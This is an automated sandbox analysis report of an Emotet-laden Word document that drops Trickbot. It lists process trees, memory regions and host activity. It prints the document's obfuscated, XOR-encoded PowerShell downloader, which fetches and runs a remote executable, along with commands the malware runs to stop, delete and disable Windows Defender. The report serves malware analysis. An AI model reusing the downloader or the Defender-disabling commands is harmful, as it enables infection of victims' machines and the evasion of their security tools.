Emotet Drops Trickbot (25-Jun-18) | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win7_64_sp1-mso2007 | ms_office
Classification: Exploit, Dropper, Downloader

3985bc09caa13dadf70187a20d271303c272a41404beb497ac6116a5722a05d1 (SHA256)

022543.doc

Word Document

Created at 2018-06-25 14:51:00

Notifications (1/1)

The operating system was rebooted during the analysis.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x940 Analysis Target Medium winword.exe "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" -
#2 0xa08 Child Process Medium powershell.exe PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'') #1
#3 0xb40 Child Process Medium 280.exe "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe" #2
#4 0xb50 Child Process Medium 280.exe "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe" #3
#5 0xb64 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" #4
#6 0xb70 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" #5
#8 0x4f4 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" #6
#9 0x64 Child Process Medium oyvgkgw.exe "C:\ProgramData\oyvGkGw.exe" #6
#10 0x8a0 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" #6
#11 0x728 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" #6
#12 0x834 Child Process Medium syncpack_.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" #6
#13 0x7b4 Child Process Medium surtq5qk9h.exe "C:\ProgramData\suRtQ5QK9h.exe" #6
#14 0x62c Child Process Medium oyvgkgw.exe "C:\ProgramData\oyvGkGw.exe" #9
#15 0x13c Child Process Medium cmd.exe /c sc stop WinDefend #14
#16 0x77c Child Process Medium cmd.exe /c sc delete WinDefend #14
#17 0x648 Child Process Medium cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true #14
#18 0x914 Child Process Medium powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true #17
#19 0x9a4 Child Process Medium sc.exe sc delete WinDefend #16
#20 0x9d8 Child Process Medium sc.exe sc stop WinDefend #15
#21 0x200 RPC Server High (Elevated) dllhost.exe C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} #14
#22 0x3d4 Child Process High (Elevated) oyvhkhw.exe "C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe" #21

Behavior Information - Grouped by Category

Process #1: winword.exe
42 0
»
Information Value
ID #1
File Name c:\program files (x86)\microsoft office\office12\winword.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:00:52, Reason: Analysis Target
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:04:16
OS Process Information
»
Information Value
PID 0x940
Parent PID 0x520 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9A0
0x 99C
0x 998
0x 994
0x 990
0x 968
0x 944
0x 9F4
0x 9F8
0x 9FC
0x A04
0x A2C
0x B84
0x B90
0x 85C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000000000020000 0x00020000 0x00022fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000030000 0x00030000 0x00032fff Pagefile Backed Memory Readable False False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable False False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable False False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable False False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable False False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory Readable, Writable False False False -
private_0x0000000000150000 0x00150000 0x0017afff Private Memory Readable, Writable False False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000190000 0x00190000 0x00192fff Pagefile Backed Memory Readable False False False -
private_0x00000000001a0000 0x001a0000 0x001a3fff Private Memory Readable, Writable False False False -
private_0x00000000001b0000 0x001b0000 0x001c7fff Private Memory Readable, Writable False False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable False False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable False False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable False False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory - False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable False False False -
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory Readable, Writable False False False -
private_0x0000000000230000 0x00230000 0x0023ffff Private Memory Readable, Writable False False False -
private_0x0000000000240000 0x00240000 0x0024ffff Private Memory Readable, Writable False False False -
private_0x0000000000250000 0x00250000 0x0034ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000350000 0x00350000 0x004d7fff Pagefile Backed Memory Readable False False False -
private_0x00000000004e0000 0x004e0000 0x004effff Private Memory - False False False -
private_0x00000000004f0000 0x004f0000 0x004fffff Private Memory Readable, Writable False False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory Readable, Writable False False False -
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable False False False -
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory Readable, Writable False False False -
private_0x0000000000530000 0x00530000 0x005affff Private Memory Readable, Writable False False False -
pagefile_0x00000000005b0000 0x005b0000 0x00730fff Pagefile Backed Memory Readable False False False -
private_0x0000000000740000 0x00740000 0x0074ffff Private Memory Readable, Writable False False False -
private_0x0000000000750000 0x00750000 0x0075ffff Private Memory Readable, Writable False False False -
private_0x0000000000760000 0x00760000 0x0076ffff Private Memory Readable, Writable False False False -
private_0x0000000000770000 0x00770000 0x0077ffff Private Memory Readable, Writable False False False -
private_0x0000000000780000 0x00780000 0x0078ffff Private Memory Readable, Writable False False False -
private_0x0000000000790000 0x00790000 0x0088ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000890000 0x00890000 0x01c8ffff Pagefile Backed Memory Readable False False False -
office.odf 0x01c90000 0x01ec9fff Memory Mapped File Readable False False False -
pagefile_0x0000000001ed0000 0x01ed0000 0x01faefff Pagefile Backed Memory Readable False False False -
private_0x0000000001fb0000 0x01fb0000 0x01feffff Private Memory Readable, Writable False False False -
private_0x0000000001ff0000 0x01ff0000 0x01ffffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002000000 0x02000000 0x02001fff Pagefile Backed Memory Readable False False False -
sortdefault.nls 0x02010000 0x022defff Memory Mapped File Readable False False False -
private_0x00000000022e0000 0x022e0000 0x022fffff Private Memory Readable, Writable False False False -
private_0x0000000002300000 0x02300000 0x0230ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002310000 0x02310000 0x02310fff Pagefile Backed Memory Readable False False False -
private_0x0000000002320000 0x02320000 0x0232ffff Private Memory Readable, Writable False False False -
private_0x0000000002330000 0x02330000 0x0233ffff Private Memory Readable, Writable False False False -
private_0x0000000002340000 0x02340000 0x0234ffff Private Memory Readable, Writable False False False -
private_0x0000000002350000 0x02350000 0x0235ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002360000 0x02360000 0x02360fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002370000 0x02370000 0x0237ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002380000 0x02380000 0x02386fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002390000 0x02390000 0x02391fff Pagefile Backed Memory Readable, Writable False False False -
private_0x00000000023a0000 0x023a0000 0x023a0fff Private Memory Readable, Writable, Executable False False False -
private_0x00000000023b0000 0x023b0000 0x023b0fff Private Memory Readable, Writable False False False -
pagefile_0x00000000023c0000 0x023c0000 0x023c0fff Pagefile Backed Memory Readable False False False -
private_0x00000000023d0000 0x023d0000 0x023dffff Private Memory Readable, Writable False False False -
private_0x00000000023e0000 0x023e0000 0x023effff Private Memory Readable, Writable False False False -
private_0x00000000023f0000 0x023f0000 0x0242ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002430000 0x02430000 0x02430fff Pagefile Backed Memory Readable False False False -
private_0x0000000002440000 0x02440000 0x0247ffff Private Memory Readable, Writable False False False -
staticcache.dat 0x02480000 0x02daffff Memory Mapped File Readable False False False -
pagefile_0x0000000002db0000 0x02db0000 0x02db0fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002dc0000 0x02dc0000 0x02dc0fff Pagefile Backed Memory Readable False False False -
private_0x0000000002dd0000 0x02dd0000 0x02ddffff Private Memory Readable, Writable False False False -
private_0x0000000002de0000 0x02de0000 0x02deffff Private Memory Readable, Writable False False False -
private_0x0000000002df0000 0x02df0000 0x02dfffff Private Memory Readable, Writable False False False -
private_0x0000000002e00000 0x02e00000 0x02e0ffff Private Memory Readable, Writable False False False -
private_0x0000000002e10000 0x02e10000 0x02e1ffff Private Memory Readable, Writable False False False -
private_0x0000000002e20000 0x02e20000 0x02e2ffff Private Memory Readable, Writable False False False -
private_0x0000000002e30000 0x02e30000 0x02e3ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002e40000 0x02e40000 0x02e41fff Pagefile Backed Memory Readable False False False -
private_0x0000000002e50000 0x02e50000 0x02e5ffff Private Memory Readable, Writable False False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x02e60000 0x02e7efff Memory Mapped File Readable False False False -
pagefile_0x0000000002e80000 0x02e80000 0x02e80fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002e90000 0x02e90000 0x02e9ffff Private Memory Readable, Writable False False False -
private_0x0000000002ea0000 0x02ea0000 0x02edffff Private Memory Readable, Writable, Executable False False False -
msxml5r.dll 0x02ee0000 0x02ef6fff Memory Mapped File Readable False False False -
private_0x0000000002f00000 0x02f00000 0x02f0ffff Private Memory Readable, Writable False False False -
private_0x0000000002f10000 0x02f10000 0x02f1ffff Private Memory Readable, Writable False False False -
private_0x0000000002f20000 0x02f20000 0x02f2ffff Private Memory Readable, Writable False False False -
private_0x0000000002f30000 0x02f30000 0x02faffff Private Memory Readable, Writable False False False -
private_0x0000000002fb0000 0x02fb0000 0x02fbffff Private Memory Readable, Writable False False False -
private_0x0000000002fc0000 0x02fc0000 0x02ffffff Private Memory Readable, Writable False False False -
private_0x0000000003000000 0x03000000 0x0303ffff Private Memory Readable, Writable False False False -
private_0x0000000003040000 0x03040000 0x0304ffff Private Memory Readable, Writable False False False -
private_0x0000000003050000 0x03050000 0x0305ffff Private Memory Readable, Writable False False False -
private_0x0000000003060000 0x03060000 0x0306ffff Private Memory Readable, Writable False False False -
private_0x0000000003070000 0x03070000 0x0307ffff Private Memory Readable, Writable False False False -
private_0x0000000003080000 0x03080000 0x0308ffff Private Memory Readable, Writable False False False -
private_0x0000000003090000 0x03090000 0x030cffff Private Memory Readable, Writable, Executable False False False -
pagefile_0x00000000030d0000 0x030d0000 0x034c2fff Pagefile Backed Memory Readable False False False -
private_0x00000000034d0000 0x034d0000 0x034dffff Private Memory Readable, Writable False False False -
private_0x00000000034e0000 0x034e0000 0x0351ffff Private Memory Readable, Writable False False False -
private_0x0000000003520000 0x03520000 0x0352ffff Private Memory Readable, Writable False False False -
private_0x0000000003530000 0x03530000 0x0353ffff Private Memory Readable, Writable False False False -
private_0x0000000003540000 0x03540000 0x0357ffff Private Memory Readable, Writable False False False -
private_0x0000000003580000 0x03580000 0x0358ffff Private Memory Readable, Writable False False False -
private_0x0000000003590000 0x03590000 0x0359ffff Private Memory Readable, Writable False False False -
private_0x00000000035a0000 0x035a0000 0x035affff Private Memory Readable, Writable False False False -
private_0x00000000035b0000 0x035b0000 0x035effff Private Memory Readable, Writable False False False -
private_0x00000000035f0000 0x035f0000 0x0362ffff Private Memory Readable, Writable False False False -
private_0x0000000003630000 0x03630000 0x0363ffff Private Memory Readable, Writable False False False -
private_0x0000000003640000 0x03640000 0x0364efff Private Memory Readable, Writable False False False -
private_0x0000000003650000 0x03650000 0x0374ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000003750000 0x03750000 0x03b4ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000003b50000 0x03b50000 0x03b51fff Private Memory Readable, Writable False False False -
msctf.dll.mui 0x03b60000 0x03b60fff Memory Mapped File Readable, Writable False False False -
private_0x0000000003b70000 0x03b70000 0x03b7ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000003b80000 0x03b80000 0x03b80fff Pagefile Backed Memory Readable False False False -
private_0x0000000003b90000 0x03b90000 0x03c8ffff Private Memory Readable, Writable False False False -
private_0x0000000003c90000 0x03c90000 0x03d8ffff Private Memory Readable, Writable False False False -
kernelbase.dll.mui 0x03d90000 0x03e4ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000003e50000 0x03e50000 0x03e71fff Private Memory Readable, Writable False False False -
private_0x0000000003e80000 0x03e80000 0x03e8ffff Private Memory Readable, Writable False False False -
private_0x0000000003e90000 0x03e90000 0x0428ffff Private Memory Readable, Writable False False False -
private_0x0000000004290000 0x04290000 0x042a5fff Private Memory Readable, Writable False False False -
private_0x00000000042b0000 0x042b0000 0x042bffff Private Memory Readable, Writable False False False -
private_0x00000000042c0000 0x042c0000 0x042c5fff Private Memory Readable, Writable False False False -
private_0x00000000042d0000 0x042d0000 0x042d0fff Private Memory Readable, Writable False False False -
private_0x00000000042e0000 0x042e0000 0x0431ffff Private Memory Readable, Writable False False False -
private_0x0000000004320000 0x04320000 0x04320fff Private Memory Readable, Writable False False False -
private_0x0000000004330000 0x04330000 0x04338fff Private Memory Readable, Writable False False False -
private_0x0000000004340000 0x04340000 0x0434ffff Private Memory Readable, Writable False False False -
private_0x0000000004350000 0x04350000 0x04358fff Private Memory Readable, Writable False False False -
private_0x0000000004360000 0x04360000 0x04373fff Private Memory Readable, Writable False False False -
private_0x0000000004390000 0x04390000 0x04392fff Private Memory Readable, Writable False False False -
private_0x00000000043a0000 0x043a0000 0x043b2fff Private Memory Readable, Writable False False False -
private_0x0000000004410000 0x04410000 0x0444ffff Private Memory Readable, Writable False False False -
private_0x00000000044c0000 0x044c0000 0x045bffff Private Memory Readable, Writable False False False -
private_0x0000000004620000 0x04620000 0x0471ffff Private Memory Readable, Writable False False False -
private_0x0000000004720000 0x04720000 0x04adefff Private Memory Readable, Writable False False False -
private_0x0000000004bd0000 0x04bd0000 0x04c0ffff Private Memory Readable, Writable False False False -
private_0x0000000004c90000 0x04c90000 0x04d8ffff Private Memory Readable, Writable False False False -
private_0x0000000004d90000 0x04d90000 0x04e8ffff Private Memory Readable, Writable False False False -
winword.exe 0x2fc50000 0x2fca6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp80.dll 0x70290000 0x70316fff Memory Mapped File Readable, Writable, Executable False False False -
msproof6.dll 0x70320000 0x703d5fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x70420000 0x7044dfff Memory Mapped File Readable, Writable, Executable False False False -
msointl.dll 0x70450000 0x70e2cfff Memory Mapped File Readable, Writable, Executable False False False -
msores.dll 0x70e30000 0x71483fff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x71490000 0x724a7fff Memory Mapped File Readable, Writable, Executable False False False -
oart.dll 0x724b0000 0x7322ffff Memory Mapped File Readable, Writable, Executable False False False -
wwlib.dll 0x73230000 0x742dbfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 217 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create Directory C:\Users\kFT6uTQW\AppData\Local\Temp\VBE - True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (1)
»
Operation Key Additional Information Success Count Logfile
Read Value 8804558B-B773-11d1-BC3E-0000F87552E7 data = } False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'') os_pid = 0xa08, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (29)
»
Operation Module Additional Information Success Count Logfile
Load C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL base_address = 0x65300000 True 1
Fn
Get Handle KERNEL32.DLL base_address = 0x75fb0000 True 2
Fn
Get Handle kernel32.dll base_address = 0x75fb0000 True 1
Fn
Get Handle KERNEL32 base_address = 0x75fb0000 True 1
Fn
Get Handle c:\program files (x86)\microsoft office\office12\winword.exe base_address = 0x2fc50000 True 1
Fn
Get Handle USER32 base_address = 0x771c0000 True 1
Fn
Get Handle ole32.dll base_address = 0x75be0000 True 1
Fn
Get Filename - process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE, size = 260 True 1
Fn
Get Filename - process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 True 3
Fn
Get Address Unknown module name function = FlsAlloc, address_out = 0x75fc4f2b True 1
Fn
Get Address Unknown module name function = FlsGetValue, address_out = 0x75fc1252 True 1
Fn
Get Address Unknown module name function = FlsSetValue, address_out = 0x75fc4208 True 1
Fn
Get Address Unknown module name function = FlsFree, address_out = 0x75fc359f True 1
Fn
Get Address Unknown module name function = InitializeCriticalSectionAndSpinCount, address_out = 0x75fc1916 True 1
Fn
Get Address Unknown module name function = EncodePointer, address_out = 0x77c20fcb True 1
Fn
Get Address Unknown module name function = DecodePointer, address_out = 0x77c19d35 True 1
Fn
Get Address Unknown module name function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Get Address Unknown module name function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Get Address Unknown module name function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Get Address Unknown module name function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Get Address Unknown module name function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Get Address Unknown module name function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Get Address Unknown module name function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Get Address Unknown module name function = EnumDisplayDevicesA, address_out = 0x771e4572 True 1
Fn
Get Address Unknown module name function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Get Address Unknown module name function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Get Time type = Local Time, time = 2018-06-26 00:52:11 (Local Time) True 1
Fn
Get Time type = Local Time, time = 2018-06-26 00:52:13 (Local Time) True 1
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Operating System True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #2: powershell.exe
761 34
»
Information Value
ID #2
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'')
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:01:06, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:04:02
OS Process Information
»
Information Value
PID 0xa08
Parent PID 0x940 (c:\program files (x86)\microsoft office\office12\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A0C
0x A20
0x A24
0x A28
0x A30
0x A34
0x A90
0x AA0
0x AA4
0x AA8
0x B3C
0x B48
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x00080000 0x00082fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False -
